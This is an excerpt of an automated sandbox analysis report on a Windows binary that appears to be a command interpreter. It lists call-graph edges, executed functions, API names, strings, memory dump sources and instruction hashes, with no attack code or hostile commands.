20725->20715 20725->20716 20725->20721 20729 7ff6a0e9d589 20725->20729 20726->20722 20728->20723 20729->20715 20729->20724 20731 7ff6a0e9d381 20730->20731 20732 7ff6a0e9d3d8 20730->20732 20733 7ff6a0e834a0 166 API calls 20731->20733 20735 7ff6a0e9d390 20733->20735 20734 7ff6a0e83448 166 API calls 20734->20735 20735->20732 20735->20734 20736 7ff6a0e834a0 166 API calls 20735->20736 20736->20735 20738 7ff6a0e83448 166 API calls 20737->20738 20739 7ff6a0e9d33b 20738->20739 20740 7ff6a0e9d36c 166 API calls 20739->20740 20741 7ff6a0e9d343 20740->20741 20742 7ff6a0e9d3fc 166 API calls 20741->20742 20759 7ff6a0e9d34e 20742->20759 20743 7ff6a0e9d5c2 20743->20713 20744 7ff6a0e83448 166 API calls 20744->20759 20745 7ff6a0e9d592 20747 7ff6a0e83448 166 API calls 20745->20747 20746 7ff6a0e9d5c4 20748 7ff6a0e83448 166 API calls 20746->20748 20750 7ff6a0e9d5a5 20747->20750 20748->20743 20749 7ff6a0e9d31c 166 API calls 20749->20743 20752 7ff6a0e9d5ba 20750->20752 20755 7ff6a0e83448 166 API calls 20750->20755 20751 7ff6a0e9d546 20751->20746 20753 7ff6a0e9d555 20751->20753 20756 7ff6a0e9d36c 166 API calls 20752->20756 20753->20749 20754 7ff6a0e9d541 20754->20745 20754->20746 20754->20751 20758 7ff6a0e9d589 20754->20758 20755->20752 20756->20743 20757 7ff6a0e9d3fc 166 API calls 20757->20759 20758->20745 20758->20753 20759->20743 20759->20744 20759->20745 20759->20746 20759->20753 20759->20754 20759->20757 20763 7ff6a0e9773c 20760->20763 20761 7ff6a0e9777d 20761->20694 20762 7ff6a0e83448 166 API calls 20762->20763 20763->20761 20763->20762 20765 7ff6a0e9778c 166 API calls 20764->20765 20766 7ff6a0e976fb 20765->20766 20767 7ff6a0e9771c 20766->20767 20768 7ff6a0e83448 166 API calls 20766->20768 20767->20694 20769 7ff6a0e97711 20768->20769 20770 7ff6a0e9778c 166 API calls 20769->20770 20770->20767 20772 7ff6a0e7c4c9 20771->20772 20773 7ff6a0e7c486 20771->20773 20776 7ff6a0e7ff70 2 API calls 20772->20776 20778 7ff6a0e7c161 20772->20778 20774 7ff6a0e7c48e wcschr 20773->20774 20773->20778 20775 7ff6a0e7c4ef 20774->20775 20774->20778 20777 7ff6a0e7cd90 166 API calls 20775->20777 20776->20778 20784 7ff6a0e7c4f9 20777->20784 20778->20265 20778->20287 20779 7ff6a0e7c541 20779->20778 20781 7ff6a0e7ff70 2 API calls 20779->20781 20780 7ff6a0e7d840 178 API calls 20780->20784 20781->20778 20782 7ff6a0e7b6b0 170 API calls 20782->20779 20783 7ff6a0e7c5bd 20783->20779 20783->20782 20784->20778 20784->20779 20784->20780 20784->20783 20786 7ff6a0e7b018 20785->20786 20786->20326 20787->20326 20789 7ff6a0e88f80 7 API calls 20788->20789 20790 7ff6a0e8296b 20789->20790 20790->20396 20792 7ff6a0e82f2a 20791->20792 20793 7ff6a0e82f97 20791->20793 20794 7ff6a0e8823c 10 API calls 20792->20794 20793->20792 20795 7ff6a0e82f9c wcschr 20793->20795 20797 7ff6a0e82f56 20794->20797 20796 7ff6a0e82fb6 wcschr 20795->20796 20803 7ff6a0e82f5a 20795->20803 20796->20792 20796->20803 20798 7ff6a0e83a0c 2 API calls 20797->20798 20797->20803 20799 7ff6a0e82fe0 20798->20799 20801 7ff6a0e82fe9 wcsrchr 20799->20801 20799->20803 20800 7ff6a0e88f80 7 API calls 20802 7ff6a0e82f83 20800->20802 20801->20803 20802->20396 20803->20800 20804 7ff6a0e8e4ec 20803->20804 20806 7ff6a0e94621 20805->20806 20807 7ff6a0e772de 20805->20807 20808 7ff6a0e947e0 20806->20808 20810 7ff6a0e9447b longjmp 20806->20810 20815 7ff6a0e94639 20806->20815 20822 7ff6a0e9475e 20806->20822 20809 7ff6a0e772eb 20807->20809 20813 7ff6a0e94530 20807->20813 20814 7ff6a0e94467 20807->20814 20811 7ff6a0e77348 168 API calls 20808->20811 20866 7ff6a0e77348 20809->20866 20816 7ff6a0e94492 20810->20816 20865 7ff6a0e94524 20811->20865 20821 7ff6a0e77348 168 API calls 20813->20821 20814->20809 20814->20816 20828 7ff6a0e94475 20814->20828 20818 7ff6a0e9463e 20815->20818 20819 7ff6a0e94695 20815->20819 20820 7ff6a0e77348 168 API calls 20816->20820 20818->20810 20839 7ff6a0e94654 20818->20839 20827 7ff6a0e773d4 168 API calls 20819->20827 20830 7ff6a0e944a8 20820->20830 20833 7ff6a0e94549 20821->20833 20829 7ff6a0e77348 168 API calls 20822->20829 20823 7ff6a0e77315 20881 7ff6a0e773d4 20823->20881 20824 7ff6a0e772b0 168 API calls 20831 7ff6a0e9480e 20824->20831 20825 7ff6a0e77348 168 API calls 20825->20823 20843 7ff6a0e9469a 20827->20843 20828->20810 20828->20819 20829->20808 20840 7ff6a0e944e2 20830->20840 20846 7ff6a0e77348 168 API calls 20830->20846 20831->20415 20832 7ff6a0e945b2 20834 7ff6a0e77348 168 API calls 20832->20834 20833->20832 20841 7ff6a0e9455e 20833->20841 20852 7ff6a0e77348 168 API calls 20833->20852 20838 7ff6a0e945c7 20834->20838 20835 7ff6a0e77348 168 API calls 20842 7ff6a0e77323 20835->20842 20836 7ff6a0e772b0 168 API calls 20848 7ff6a0e94738 20836->20848 20837 7ff6a0e946e1 20837->20836 20845 7ff6a0e77348 168 API calls 20838->20845 20839->20835 20847 7ff6a0e772b0 168 API calls 20840->20847 20841->20832 20844 7ff6a0e77348 168 API calls 20841->20844 20842->20415 20843->20837 20857 7ff6a0e946c7 20843->20857 20858 7ff6a0e946ea 20843->20858 20844->20832 20851 7ff6a0e945db 20845->20851 20846->20840 20849 7ff6a0e944f1 20847->20849 20850 7ff6a0e77348 168 API calls 20848->20850 20854 7ff6a0e772b0 168 API calls 20849->20854 20850->20865 20853 7ff6a0e77348 168 API calls 20851->20853 20852->20841 20855 7ff6a0e945ec 20853->20855 20856 7ff6a0e94503 20854->20856 20860 7ff6a0e77348 168 API calls 20855->20860 20856->20842 20862 7ff6a0e77348 168 API calls 20856->20862 20857->20837 20863 7ff6a0e77348 168 API calls 20857->20863 20859 7ff6a0e77348 168 API calls 20858->20859 20859->20837 20861 7ff6a0e94600 20860->20861 20864 7ff6a0e77348 168 API calls 20861->20864 20862->20865 20863->20837 20864->20865 20865->20824 20865->20842 20873 7ff6a0e7735d 20866->20873 20867 7ff6a0e73278 166 API calls 20868 7ff6a0e94820 longjmp 20867->20868 20869 7ff6a0e94838 20868->20869 20870 7ff6a0e73278 166 API calls 20869->20870 20871 7ff6a0e94844 longjmp 20870->20871 20872 7ff6a0e9485a 20871->20872 20874 7ff6a0e77348 166 API calls 20872->20874 20873->20867 20873->20869 20873->20873 20880 7ff6a0e773ab 20873->20880 20875 7ff6a0e9487b 20874->20875 20876 7ff6a0e77348 166 API calls 20875->20876 20877 7ff6a0e948ad 20876->20877 20878 7ff6a0e77348 166 API calls 20877->20878 20879 7ff6a0e772ff 20878->20879 20879->20823 20879->20825 20882 7ff6a0e9485a 20881->20882 20883 7ff6a0e77401 20881->20883 20884 7ff6a0e77348 168 API calls 20882->20884 20883->20842 20885 7ff6a0e9487b 20884->20885 20886 7ff6a0e77348 168 API calls 20885->20886 20887 7ff6a0e948ad 20886->20887 20888 7ff6a0e77348 168 API calls 20887->20888 20889 7ff6a0e948be 20888->20889 20889->20842 16736 7ff6a0e88d80 16737 7ff6a0e88da4 16736->16737 16738 7ff6a0e88db6 16737->16738 16739 7ff6a0e88dbf Sleep 16737->16739 16740 7ff6a0e88ddb _amsg_exit 16738->16740 16742 7ff6a0e88de7 16738->16742 16739->16737 16740->16742 16741 7ff6a0e88e56 _initterm 16744 7ff6a0e88e73 _IsNonwritableInCurrentImage 16741->16744 16742->16741 16743 7ff6a0e88e3c 16742->16743 16742->16744 16750 7ff6a0e837d8 GetCurrentThreadId OpenThread 16744->16750 16783 7ff6a0e804f4 16750->16783 16752 7ff6a0e83839 HeapSetInformation RegOpenKeyExW 16753 7ff6a0e8388d 16752->16753 16754 7ff6a0e8e9f8 RegQueryValueExW RegCloseKey 16752->16754 16755 7ff6a0e85920 VirtualQuery VirtualQuery 16753->16755 16757 7ff6a0e8ea41 GetThreadLocale 16754->16757 16756 7ff6a0e838ab GetConsoleOutputCP GetCPInfo 16755->16756 16756->16757 16758 7ff6a0e838f1 memset 16756->16758 16769 7ff6a0e83919 16757->16769 16758->16769 16759 7ff6a0e84d5c 391 API calls 16759->16769 16760 7ff6a0e83948 _setjmp 16760->16769 16761 7ff6a0e8eb27 _setjmp 16761->16769 16762 7ff6a0e98530 370 API calls 16762->16769 16763 7ff6a0e801b8 6 API calls 16763->16769 16764 7ff6a0e73240 166 API calls 16764->16769 16765 7ff6a0e84c1c 166 API calls 16765->16769 16766 7ff6a0e8eb71 _setmode 16766->16769 16767 7ff6a0e886f0 182 API calls 16767->16769 16768 7ff6a0e80580 12 API calls 16770 7ff6a0e8398b GetConsoleOutputCP GetCPInfo 16768->16770 16769->16754 16769->16759 16769->16760 16769->16761 16769->16762 16769->16763 16769->16764 16769->16765 16769->16766 16769->16767 16769->16768 16771 7ff6a0e858e4 EnterCriticalSection LeaveCriticalSection 16769->16771 16773 7ff6a0e7be00 647 API calls 16769->16773 16774 7ff6a0e7df60 481 API calls 16769->16774 16775 7ff6a0e858e4 EnterCriticalSection LeaveCriticalSection 16769->16775 16772 7ff6a0e804f4 GetModuleHandleW GetProcAddress SetThreadLocale 16770->16772 16771->16769 16772->16769 16773->16769 16774->16769 16776 7ff6a0e8ebbe GetConsoleOutputCP GetCPInfo 16775->16776 16777 7ff6a0e804f4 GetModuleHandleW GetProcAddress SetThreadLocale 16776->16777 16778 7ff6a0e8ebe6 16777->16778 16779 7ff6a0e7be00 647 API calls 16778->16779 16780 7ff6a0e80580 12 API calls 16778->16780 16779->16778 16781 7ff6a0e8ebfc GetConsoleOutputCP GetCPInfo 16780->16781 16782 7ff6a0e804f4 GetModuleHandleW GetProcAddress SetThreadLocale 16781->16782 16782->16769 16785 7ff6a0e80504 16783->16785 16784 7ff6a0e8051e GetModuleHandleW 16784->16785 16785->16784 16786 7ff6a0e8054d GetProcAddress 16785->16786 16787 7ff6a0e8056c SetThreadLocale 16785->16787 16786->16785

                                                                                          Executed Functions

                                                                                          Function 00007FF6A0E80A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                                          • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                                          • API String ID: 3305344409-4288247545
                                                                                          • Opcode ID: 5bcb5a32135a78ce5bcbb0bd87fd70d4c732013b852077ef085f129da322652b
                                                                                          • Instruction ID: 4efeee771ca3bf04461ab87d733f6921306c89df7626f763dbba8c621a623b9f
                                                                                          • Opcode Fuzzy Hash: 5bcb5a32135a78ce5bcbb0bd87fd70d4c732013b852077ef085f129da322652b
                                                                                          • Instruction Fuzzy Hash: 6D42E131A0F783A6EB648B2198442BA67A1FF89B95F144234DD1ECB7D5DF3CE448A340
                                                                                          Function 00007FF6A0E7AA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 216 7ff6a0e7aa54-7ff6a0e7aa98 call 7ff6a0e7cd90 219 7ff6a0e8bf5a-7ff6a0e8bf70 call 7ff6a0e84c1c call 7ff6a0e7ff70 216->219 220 7ff6a0e7aa9e 216->220 221 7ff6a0e7aaa5-7ff6a0e7aaa8 220->221 223 7ff6a0e7acde-7ff6a0e7ad00 221->223 224 7ff6a0e7aaae-7ff6a0e7aac8 wcschr 221->224 229 7ff6a0e7ad06 223->229 224->223 226 7ff6a0e7aace-7ff6a0e7aae9 towlower 224->226 226->223 228 7ff6a0e7aaef-7ff6a0e7aaf3 226->228 231 7ff6a0e7aaf9-7ff6a0e7aafd 228->231 232 7ff6a0e8beb7-7ff6a0e8bec4 call 7ff6a0e9eaf0 228->232 233 7ff6a0e7ad0d-7ff6a0e7ad1f 229->233 235 7ff6a0e8bbcf 231->235 236 7ff6a0e7ab03-7ff6a0e7ab07 231->236 248 7ff6a0e8bf43-7ff6a0e8bf59 call 7ff6a0e84c1c 232->248 249 7ff6a0e8bec6-7ff6a0e8bed8 call 7ff6a0e73240 232->249 237 7ff6a0e7ad22-7ff6a0e7ad2a call 7ff6a0e813e0 233->237 243 7ff6a0e8bbde 235->243 239 7ff6a0e7ab7d-7ff6a0e7ab81 236->239 240 7ff6a0e7ab09-7ff6a0e7ab0d 236->240 237->221 244 7ff6a0e8be63 239->244 245 7ff6a0e7ab87-7ff6a0e7ab95 239->245 240->244 246 7ff6a0e7ab13-7ff6a0e7ab17 240->246 256 7ff6a0e8bbea-7ff6a0e8bbec 243->256 259 7ff6a0e8be72-7ff6a0e8be88 call 7ff6a0e73278 call 7ff6a0e84c1c 244->259 251 7ff6a0e7ab98-7ff6a0e7aba0 245->251 246->239 252 7ff6a0e7ab19-7ff6a0e7ab1d 246->252 248->219 249->248 260 7ff6a0e8beda-7ff6a0e8bee9 call 7ff6a0e73240 249->260 251->251 257 7ff6a0e7aba2-7ff6a0e7abb3 call 7ff6a0e7cd90 251->257 252->243 258 7ff6a0e7ab23-7ff6a0e7ab27 252->258 265 7ff6a0e8bbf8-7ff6a0e8bc01 256->265 257->219 271 7ff6a0e7abb9-7ff6a0e7abde call 7ff6a0e813e0 call 7ff6a0e833a8 257->271 258->256 262 7ff6a0e7ab2d-7ff6a0e7ab31 258->262 281 7ff6a0e8be89-7ff6a0e8be8c 259->281 274 7ff6a0e8bef3-7ff6a0e8bef9 260->274 275 7ff6a0e8beeb-7ff6a0e8bef1 260->275 262->229 267 7ff6a0e7ab37-7ff6a0e7ab3b 262->267 265->233 267->265 272 7ff6a0e7ab41-7ff6a0e7ab45 267->272 311 7ff6a0e7ac75 271->311 312 7ff6a0e7abe4-7ff6a0e7abe7 271->312 277 7ff6a0e7ab4b-7ff6a0e7ab4f 272->277 278 7ff6a0e8bc06-7ff6a0e8bc2a call 7ff6a0e813e0 272->278 274->248 282 7ff6a0e8befb-7ff6a0e8bf0d call 7ff6a0e73240 274->282 275->248 275->274 279 7ff6a0e7ab55-7ff6a0e7ab78 call 7ff6a0e813e0 277->279 280 7ff6a0e7ad2f-7ff6a0e7ad33 277->280 298 7ff6a0e8bc5a-7ff6a0e8bc61 278->298 299 7ff6a0e8bc2c-7ff6a0e8bc4c _wcsnicmp 278->299 279->221 290 7ff6a0e7ad39-7ff6a0e7ad3d 280->290 291 7ff6a0e8bc66-7ff6a0e8bc8a call 7ff6a0e813e0 280->291 286 7ff6a0e8be92-7ff6a0e8beaa call 7ff6a0e73278 call 7ff6a0e84c1c 281->286 287 7ff6a0e7acbe 281->287 282->248 307 7ff6a0e8bf0f-7ff6a0e8bf21 call 7ff6a0e73240 282->307 340 7ff6a0e8beab-7ff6a0e8beb6 call 7ff6a0e84c1c 286->340 295 7ff6a0e7acc0-7ff6a0e7acc7 287->295 300 7ff6a0e8bcde-7ff6a0e8bd02 call 7ff6a0e813e0 290->300 301 7ff6a0e7ad43-7ff6a0e7ad49 290->301 314 7ff6a0e8bcc4-7ff6a0e8bcdc 291->314 315 7ff6a0e8bc8c-7ff6a0e8bcaa _wcsnicmp 291->315 295->295 304 7ff6a0e7acc9-7ff6a0e7acda 295->304 313 7ff6a0e8bd31-7ff6a0e8bd4f _wcsnicmp 298->313 299->298 308 7ff6a0e8bc4e-7ff6a0e8bc55 299->308 332 7ff6a0e8bd04-7ff6a0e8bd24 _wcsnicmp 300->332 333 7ff6a0e8bd2a 300->333 309 7ff6a0e8bd5e-7ff6a0e8bd65 301->309 310 7ff6a0e7ad4f-7ff6a0e7ad68 301->310 304->223 307->248 342 7ff6a0e8bf23-7ff6a0e8bf35 call 7ff6a0e73240 307->342 322 7ff6a0e8bbb3-7ff6a0e8bbb7 308->322 309->310 323 7ff6a0e8bd6b-7ff6a0e8bd73 309->323 324 7ff6a0e7ad6d-7ff6a0e7ad70 310->324 325 7ff6a0e7ad6a 310->325 319 7ff6a0e7ac77-7ff6a0e7ac7f 311->319 312->287 326 7ff6a0e7abed-7ff6a0e7ac0b call 7ff6a0e7cd90 * 2 312->326 320 7ff6a0e8bbc2-7ff6a0e8bbca 313->320 321 7ff6a0e8bd55 313->321 314->313 315->314 330 7ff6a0e8bcac-7ff6a0e8bcbf 315->330 319->287 329 7ff6a0e7ac81-7ff6a0e7ac85 319->329 320->221 321->309 334 7ff6a0e8bbba-7ff6a0e8bbbd call 7ff6a0e813e0 322->334 335 7ff6a0e8bd79-7ff6a0e8bd8b iswxdigit 323->335 336 7ff6a0e8be4a-7ff6a0e8be5e 323->336 324->237 325->324 326->340 356 7ff6a0e7ac11-7ff6a0e7ac14 326->356 343 7ff6a0e7ac88-7ff6a0e7ac8f 329->343 330->322 332->333 341 7ff6a0e8bbac 332->341 333->313 334->320 335->336 338 7ff6a0e8bd91-7ff6a0e8bda3 iswxdigit 335->338 336->334 338->336 344 7ff6a0e8bda9-7ff6a0e8bdbb iswxdigit 338->344 340->232 341->322 342->248 357 7ff6a0e8bf37-7ff6a0e8bf3e call 7ff6a0e73240 342->357 343->343 347 7ff6a0e7ac91-7ff6a0e7ac94 343->347 344->336 349 7ff6a0e8bdc1-7ff6a0e8bdd7 iswdigit 344->349 347->287 353 7ff6a0e7ac96-7ff6a0e7acaa wcsrchr 347->353 354 7ff6a0e8bddf-7ff6a0e8bdeb towlower 349->354 355 7ff6a0e8bdd9-7ff6a0e8bddd 349->355 353->287 358 7ff6a0e7acac-7ff6a0e7acb9 call 7ff6a0e81300 353->358 361 7ff6a0e8bdee-7ff6a0e8be0f iswdigit 354->361 355->361 356->340 362 7ff6a0e7ac1a-7ff6a0e7ac33 memset 356->362 357->248 358->287 363 7ff6a0e8be11-7ff6a0e8be15 361->363 364 7ff6a0e8be17-7ff6a0e8be23 towlower 361->364 362->311 365 7ff6a0e7ac35-7ff6a0e7ac4b wcschr 362->365 366 7ff6a0e8be26-7ff6a0e8be45 call 7ff6a0e813e0 363->366 364->366 365->311 367 7ff6a0e7ac4d-7ff6a0e7ac54 365->367 366->336 368 7ff6a0e7ac5a-7ff6a0e7ac6f wcschr 367->368 369 7ff6a0e7ad72-7ff6a0e7ad91 wcschr 367->369 368->311 368->369 371 7ff6a0e7ad97-7ff6a0e7adac wcschr 369->371 372 7ff6a0e7af03-7ff6a0e7af07 369->372 371->372 373 7ff6a0e7adb2-7ff6a0e7adc7 wcschr 371->373 372->311 373->372 374 7ff6a0e7adcd-7ff6a0e7ade2 wcschr 373->374 374->372 375 7ff6a0e7ade8-7ff6a0e7adfd wcschr 374->375 375->372 376 7ff6a0e7ae03-7ff6a0e7ae18 wcschr 375->376 376->372 377 7ff6a0e7ae1e-7ff6a0e7ae21 376->377 378 7ff6a0e7ae24-7ff6a0e7ae27 377->378 378->372 379 7ff6a0e7ae2d-7ff6a0e7ae40 iswspace 378->379 380 7ff6a0e7ae4b-7ff6a0e7ae5e 379->380 381 7ff6a0e7ae42-7ff6a0e7ae49 379->381 382 7ff6a0e7ae66-7ff6a0e7ae6d 380->382 381->378 382->382 383 7ff6a0e7ae6f-7ff6a0e7ae77 382->383 383->259 384 7ff6a0e7ae7d-7ff6a0e7ae97 call 7ff6a0e813e0 383->384 387 7ff6a0e7ae9a-7ff6a0e7aea4 384->387 388 7ff6a0e7aebc-7ff6a0e7aef8 call 7ff6a0e80a6c call 7ff6a0e7ff70 * 2 387->388 389 7ff6a0e7aea6-7ff6a0e7aead 387->389 388->319 397 7ff6a0e7aefe 388->397 389->388 390 7ff6a0e7aeaf-7ff6a0e7aeba 389->390 390->387 390->388 397->281
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                                                          • String ID: :$:$:$:ON$OFF
                                                                                          • API String ID: 972821348-467788257
                                                                                          • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                          • Instruction ID: 81274820d7ba85c82bf1157e7764d68989332536d476beac4afca0a57bf362ff
                                                                                          • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                          • Instruction Fuzzy Hash: 1022B631F0B643B6FB649F2199142B9A6A1FF89B81F498035DA0EC7795DF3CA844E350
                                                                                          Function 00007FF6A0E851EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 398 7ff6a0e851ec-7ff6a0e85248 call 7ff6a0e85508 GetLocaleInfoW 401 7ff6a0e8ef32-7ff6a0e8ef3c 398->401 402 7ff6a0e8524e-7ff6a0e85272 GetLocaleInfoW 398->402 405 7ff6a0e8ef3f-7ff6a0e8ef49 401->405 403 7ff6a0e85295-7ff6a0e852b9 GetLocaleInfoW 402->403 404 7ff6a0e85274-7ff6a0e8527a 402->404 408 7ff6a0e852bb-7ff6a0e852c3 403->408 409 7ff6a0e852de-7ff6a0e85305 GetLocaleInfoW 403->409 406 7ff6a0e854f7-7ff6a0e854f9 404->406 407 7ff6a0e85280-7ff6a0e85286 404->407 410 7ff6a0e8ef61-7ff6a0e8ef6c 405->410 411 7ff6a0e8ef4b-7ff6a0e8ef52 405->411 406->401 407->406 412 7ff6a0e8528c-7ff6a0e8528f 407->412 413 7ff6a0e852c9-7ff6a0e852d7 408->413 414 7ff6a0e8ef75-7ff6a0e8ef78 408->414 415 7ff6a0e85307-7ff6a0e8531b 409->415 416 7ff6a0e85321-7ff6a0e85343 GetLocaleInfoW 409->416 410->414 411->410 417 7ff6a0e8ef54-7ff6a0e8ef5f 411->417 412->403 413->409 418 7ff6a0e8ef99-7ff6a0e8efa3 414->418 419 7ff6a0e8ef7a-7ff6a0e8ef7d 414->419 415->416 420 7ff6a0e8efaf-7ff6a0e8efb9 416->420 421 7ff6a0e85349-7ff6a0e8536e GetLocaleInfoW 416->421 417->405 417->410 418->420 419->409 422 7ff6a0e8ef83-7ff6a0e8ef8d 419->422 423 7ff6a0e8efbc-7ff6a0e8efc6 420->423 424 7ff6a0e8eff2-7ff6a0e8effc 421->424 425 7ff6a0e85374-7ff6a0e85396 GetLocaleInfoW 421->425 422->418 426 7ff6a0e8efde-7ff6a0e8efe9 423->426 427 7ff6a0e8efc8-7ff6a0e8efcf 423->427 428 7ff6a0e8efff-7ff6a0e8f009 424->428 429 7ff6a0e8539c-7ff6a0e853be GetLocaleInfoW 425->429 430 7ff6a0e8f035-7ff6a0e8f03f 425->430 426->424 427->426 432 7ff6a0e8efd1-7ff6a0e8efdc 427->432 433 7ff6a0e8f021-7ff6a0e8f02c 428->433 434 7ff6a0e8f00b-7ff6a0e8f012 428->434 435 7ff6a0e853c4-7ff6a0e853e6 GetLocaleInfoW 429->435 436 7ff6a0e8f078-7ff6a0e8f082 429->436 431 7ff6a0e8f042-7ff6a0e8f04c 430->431 439 7ff6a0e8f04e-7ff6a0e8f055 431->439 440 7ff6a0e8f064-7ff6a0e8f06f 431->440 432->423 432->426 433->430 434->433 442 7ff6a0e8f014-7ff6a0e8f01f 434->442 437 7ff6a0e853ec-7ff6a0e8540e GetLocaleInfoW 435->437 438 7ff6a0e8f0bb-7ff6a0e8f0c5 435->438 441 7ff6a0e8f085-7ff6a0e8f08f 436->441 443 7ff6a0e8f0fe-7ff6a0e8f108 437->443 444 7ff6a0e85414-7ff6a0e85436 GetLocaleInfoW 437->444 448 7ff6a0e8f0c8-7ff6a0e8f0d2 438->448 439->440 445 7ff6a0e8f057-7ff6a0e8f062 439->445 440->436 446 7ff6a0e8f091-7ff6a0e8f098 441->446 447 7ff6a0e8f0a7-7ff6a0e8f0b2 441->447 442->428 442->433 453 7ff6a0e8f10b-7ff6a0e8f115 443->453 451 7ff6a0e8543c-7ff6a0e8545e GetLocaleInfoW 444->451 452 7ff6a0e8f141-7ff6a0e8f14b 444->452 445->431 445->440 446->447 454 7ff6a0e8f09a-7ff6a0e8f0a5 446->454 447->438 449 7ff6a0e8f0d4-7ff6a0e8f0db 448->449 450 7ff6a0e8f0ea-7ff6a0e8f0f5 448->450 449->450 455 7ff6a0e8f0dd-7ff6a0e8f0e8 449->455 450->443 456 7ff6a0e8f184-7ff6a0e8f18b 451->456 457 7ff6a0e85464-7ff6a0e85486 GetLocaleInfoW 451->457 460 7ff6a0e8f14e-7ff6a0e8f158 452->460 458 7ff6a0e8f117-7ff6a0e8f11e 453->458 459 7ff6a0e8f12d-7ff6a0e8f138 453->459 454->441 454->447 455->448 455->450 461 7ff6a0e8f18e-7ff6a0e8f198 456->461 462 7ff6a0e8548c-7ff6a0e854ae GetLocaleInfoW 457->462 463 7ff6a0e8f1c4-7ff6a0e8f1ce 457->463 458->459 464 7ff6a0e8f120-7ff6a0e8f12b 458->464 459->452 465 7ff6a0e8f170-7ff6a0e8f17b 460->465 466 7ff6a0e8f15a-7ff6a0e8f161 460->466 467 7ff6a0e8f1b0-7ff6a0e8f1bb 461->467 468 7ff6a0e8f19a-7ff6a0e8f1a1 461->468 469 7ff6a0e8f207-7ff6a0e8f20e 462->469 470 7ff6a0e854b4-7ff6a0e854f5 setlocale call 7ff6a0e88f80 462->470 471 7ff6a0e8f1d1-7ff6a0e8f1db 463->471 464->453 464->459 465->456 466->465 472 7ff6a0e8f163-7ff6a0e8f16e 466->472 467->463 468->467 473 7ff6a0e8f1a3-7ff6a0e8f1ae 468->473 477 7ff6a0e8f211-7ff6a0e8f21b 469->477 475 7ff6a0e8f1f3-7ff6a0e8f1fe 471->475 476 7ff6a0e8f1dd-7ff6a0e8f1e4 471->476 472->460 472->465 473->461 473->467 475->469 476->475 479 7ff6a0e8f1e6-7ff6a0e8f1f1 476->479 480 7ff6a0e8f233-7ff6a0e8f23e 477->480 481 7ff6a0e8f21d-7ff6a0e8f224 477->481 479->471 479->475 481->480 482 7ff6a0e8f226-7ff6a0e8f231 481->482 482->477 482->480
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
